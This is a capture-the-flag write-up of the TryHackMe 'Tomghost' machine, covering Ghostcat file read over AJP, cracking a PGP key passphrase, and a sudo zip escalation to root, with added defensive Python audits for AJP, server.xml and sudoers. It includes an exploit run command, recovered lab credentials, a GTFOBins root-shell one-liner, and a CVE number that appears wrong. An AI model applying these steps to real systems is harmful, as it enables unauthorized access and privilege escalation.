# Tomghost

## Nmap

```
sudo nmap 10.10.16.201 -p- -sS -sV

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 8080 is running Tomcat as shown below:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5406d6aad6fb44800645d92ede5106ea1bb6703e%2Fimage.png?alt=media)

Port 8009 is running ajp13. Researching this service shows it is the Apache JServ Protocol connector, which runs alongside Apache Tomcat so that a front-end web server (usually Apache httpd) can forward requests to it. A brief description of the service:

*The AJP13 protocol is a packet-oriented TCP protocol; by default the service runs on port 8009. AJP13 is a binary format, intended to give better performance than the HTTP protocol running over TCP port 8080.*
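To make "packet-oriented binary format" concrete, the following is an added example (not code from the original writeup) that decodes the AJP13 envelope and the leading fields of a Forward Request, the kind of decoding a network sensor performs to classify AJP traffic on port 8009. The prefix codes, method codes and string encoding follow the published AJP13 specification; the sample packets are constructed inline for the example, not captured from the machine.

```python
import struct

# Prefix codes from the AJP13 specification, by direction of travel
REQUEST_PREFIX = {2: "FORWARD_REQUEST", 7: "SHUTDOWN", 8: "PING", 10: "CPING"}
RESPONSE_PREFIX = {3: "SEND_BODY_CHUNK", 4: "SEND_HEADERS", 5: "END_RESPONSE",
                   6: "GET_BODY_CHUNK", 9: "CPONG_REPLY"}
METHODS = {1: "OPTIONS", 2: "GET", 3: "HEAD", 4: "POST", 5: "PUT", 6: "DELETE", 7: "TRACE"}

REQUEST_MAGIC = b"\x12\x34"   # front-end proxy -> Tomcat
RESPONSE_MAGIC = b"AB"        # Tomcat -> front-end proxy


def parse_ajp_packet(raw):
    """Decode one AJP13 envelope: 2-byte magic, 2-byte big-endian length, payload."""
    if len(raw) < 4:
        raise ValueError("truncated AJP header")
    magic = raw[:2]
    if magic == REQUEST_MAGIC:
        direction, table = "request", REQUEST_PREFIX
    elif magic == RESPONSE_MAGIC:
        direction, table = "response", RESPONSE_PREFIX
    else:
        raise ValueError("not AJP13: unexpected magic %r" % magic)
    (length,) = struct.unpack(">H", raw[2:4])
    payload = raw[4:4 + length]
    if len(payload) != length:
        raise ValueError("payload truncated: header says %d bytes, got %d" % (length, len(payload)))
    prefix = payload[0] if length else None
    return {"direction": direction, "length": length, "prefix": prefix,
            "type": table.get(prefix, "UNKNOWN") if length else "EMPTY",
            "payload": payload}


def _read_string(payload, pos):
    """AJP string: 2-byte length, bytes, NUL terminator; a length of 0xFFFF encodes null."""
    (n,) = struct.unpack(">H", payload[pos:pos + 2])
    pos += 2
    if n == 0xFFFF:
        return None, pos
    return payload[pos:pos + n].decode("latin-1"), pos + n + 1


def parse_forward_request(payload):
    """Decode the leading fields of a Forward Request (prefix 2): method, protocol, URI, client address."""
    if payload[0] != 2:
        raise ValueError("not a Forward Request")
    method = METHODS.get(payload[1], "UNKNOWN(%d)" % payload[1])
    pos = 2
    protocol, pos = _read_string(payload, pos)
    uri, pos = _read_string(payload, pos)
    remote_addr, pos = _read_string(payload, pos)
    return {"method": method, "protocol": protocol, "uri": uri, "remote_addr": remote_addr}


def _ajp_string(s):
    # Encoder used only to build the constructed sample packet below
    return struct.pack(">H", len(s)) + s.encode("latin-1") + b"\x00"


# Constructed sample packets for the example (not captured from the target)
SAMPLE_CPING = b"\x12\x34\x00\x01\x0a"          # proxy asks "are you alive?"
SAMPLE_CPONG = b"AB\x00\x01\x09"                # Tomcat's CPong reply
_fwd = (b"\x02\x02"                             # prefix 2 (Forward Request), method 2 (GET)
        + _ajp_string("HTTP/1.1") + _ajp_string("/manager/html") + _ajp_string("10.0.0.5"))
SAMPLE_FORWARD = REQUEST_MAGIC + struct.pack(">H", len(_fwd)) + _fwd

if __name__ == "__main__":
    for pkt in (SAMPLE_CPING, SAMPLE_CPONG, SAMPLE_FORWARD):
        info = parse_ajp_packet(pkt)
        print(info["direction"], info["type"], info["length"])
        if info["type"] == "FORWARD_REQUEST":
            print("   ", parse_forward_request(info["payload"]))
```

The envelope is what distinguishes AJP from HTTP on the wire: a sensor that sees the `0x12 0x34` magic arriving on 8009 from anything other than the front-end proxy's address has found an AJP connector exposed beyond its intended client.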

Researching exploits for this service shows a vulnerability known as Ghostcat. This vulnerability (**CVE-2020-10487**) allows local files in the Tomcat web application directory, including configuration files, to be read over the AJP connector. Below is a PoC for this on GitHub.

{% embed url="<https://github.com/00theway/Ghostcat-CNVD-2020-10487>" %}

First download the Python file and run it with the following syntax:

```
python3 exploit.py <TargetIP> <PORT> <FileToRead> read 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-05e04a9b1cfde96f77a3ebdfdaf85a25dc6ee00b%2Fimage.png?alt=media)
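From the defensive side, this finding comes down to how the AJP connector is configured in Tomcat's `server.xml`. The following added example (not code from the writeup or from the Ghostcat PoC) audits a `server.xml` for an AJP connector that listens beyond loopback or has no shared secret. Both XML fragments are constructed for the example, `CHANGE-ME-placeholder` stands in for a real secret, and the hardened fragment mirrors the defaults Tomcat ships from 9.0.31 onwards (connector bound to loopback, `secretRequired="true"`).

```python
import xml.etree.ElementTree as ET

# Constructed fragments, not taken from the target. The first resembles the shipped default
# of Tomcat releases before 9.0.31: AJP enabled, listening on all interfaces, no shared secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# Hardened form: loopback only, and the front-end proxy must present a shared secret.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="CHANGE-ME-placeholder" redirectPort="8443"/>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return one finding per AJP connector: its port and a list of configuration issues."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").startswith("AJP"):
            continue
        issues = []
        address = conn.get("address")
        if address is None or address not in LOOPBACK:
            # No address means "bind to every interface"
            issues.append("bound to %s rather than loopback" % (address or "all interfaces"))
        if conn.get("secretRequired", "").lower() == "false":
            issues.append("secretRequired=false: unauthenticated AJP clients are accepted")
        if not conn.get("secret"):
            # Older Tomcat versions had no secretRequired attribute at all, so the absence
            # of a secret is treated as a finding regardless of version
            issues.append("no 'secret' attribute: the proxy cannot authenticate to the connector")
        findings.append({"port": conn.get("port"), "issues": issues})
    return findings


def ajp_is_hardened(server_xml):
    """True when every AJP connector in the file is free of the issues above."""
    return all(not f["issues"] for f in audit_ajp_connectors(server_xml))


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for finding in audit_ajp_connectors(xml):
            print(label, "AJP connector on port", finding["port"])
            for issue in finding["issues"] or ["no issues"]:
                print("   ", issue)
```

The most robust fix is simply to remove or comment out the AJP connector when nothing in front of Tomcat speaks AJP; the audit above is for the case where a reverse proxy genuinely needs it.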

We now have the credentials `skyfuck:8730281lkjlkjdqlksalks`. Using the gathered credentials we are then able to connect over SSH.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-169657f9de68c100b5cefe36d16936b6c6f7d682%2Fimage.png?alt=media)

The home directory for skyfuck contains a file called tryhackme.asc; this key file can be used to decrypt the contents of credential.pgp.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-082fcf8fc93f70d513b2612b17b2f6b1a3c4f99f%2Fimage.png?alt=media)

First we need to copy the contents of tryhackme.asc to our attacking machine, then use `gpg2john` to create a hash of the file. After that, John can be run to crack the passphrase.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cb75fb1bdfd78b703ff154f75b21546211b2fa1e%2Fimage.png?alt=media)

Then, in the SSH session, import the key and decrypt the credential.pgp file with `gpg -d`, supplying the cracked passphrase when prompted.

```
gpg --import tryhackme.asc
gpg -d credential.pgp
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ca495ba8706dd8b74a5e4d849866e9814bcc5073%2Fimage.png?alt=media)

With the decrypted credentials we can then SSH in as the user 'merlin'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e02d7aa7fa64ec8a3540004d38d10d2f3808ba0%2Fimage.png?alt=media)

Running `sudo -l` as this user shows we can run the zip binary as root without supplying a password. Referring to GTFOBins at <https://gtfobins.github.io/gtfobins/zip/> shows that the zip binary can be used to gain a root shell by running:

```
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
```
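The root cause here is a sudo rule that grants a GTFOBins-listed binary, with NOPASSWD on top. The following added example (not part of the original writeup) is a small sudoers audit of the kind a defender runs to catch such rules before an attacker does: it parses user-specification lines and flags any non-root rule granting `ALL` or a binary with a documented sudo shell escape. The sudoers text and the binary list are constructed for the example; the list is a small subset of GTFOBins and should be extended for real use.

```python
import os
import re

# Constructed subset of binaries for which GTFOBins documents a sudo shell escape.
# Extend from https://gtfobins.github.io/ for real use.
SHELL_ESCAPE_BINARIES = {
    "zip", "tar", "vim", "vi", "less", "more", "find", "awk", "env",
    "python", "python3", "perl", "bash", "sh",
}

# user  host=(runas) [TAG: ...] cmd1, cmd2
SUDOERS_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_sudoers_rule(line):
    """Parse one user-specification line; returns None for lines that are not rules."""
    m = SUDOERS_RULE.match(line)
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "runas": m.group("runas") or "root",   # sudo runs as root when no runas list is given
        "nopasswd": "NOPASSWD" in tags,
        "cmds": [c.strip() for c in m.group("cmds").split(",")],
    }


def audit_sudoers(text):
    """Return findings for rules granting an unrestricted command list or a shell-escape binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        rule = parse_sudoers_rule(line)
        if rule is None or rule["user"] == "root":  # root's own rule is expected
            continue
        for cmd in rule["cmds"]:
            if cmd == "ALL":
                reason = "unrestricted command list"
            else:
                binary = os.path.basename(cmd.split()[0])
                if binary not in SHELL_ESCAPE_BINARIES:
                    continue
                reason = "%s has a documented sudo shell escape on GTFOBins" % binary
            findings.append({"user": rule["user"], "runas": rule["runas"], "cmd": cmd,
                             "nopasswd": rule["nopasswd"], "reason": reason})
    return findings


# Constructed sudoers content for the example (not the target's real file)
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
merlin  ALL=(root) NOPASSWD: /usr/bin/zip
backup  ALL=(root) NOPASSWD: /usr/local/bin/backup.sh   # wrapper script, not a shell escape
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD " if f["nopasswd"] else ""
        print("%s may run %s%s as %s: %s" % (f["user"], flag, f["cmd"], f["runas"], f["reason"]))
```

A NOPASSWD rule for a wrapper script is far safer than one for a general-purpose archiver: the rule should name the narrowest command that does the job, and binaries with built-in shell escapes should never be granted to untrusted users through sudo.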

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5f02a6c596e9a8ed4ea4f7c8dc440a5e06ae0904%2Fimage.png?alt=media)
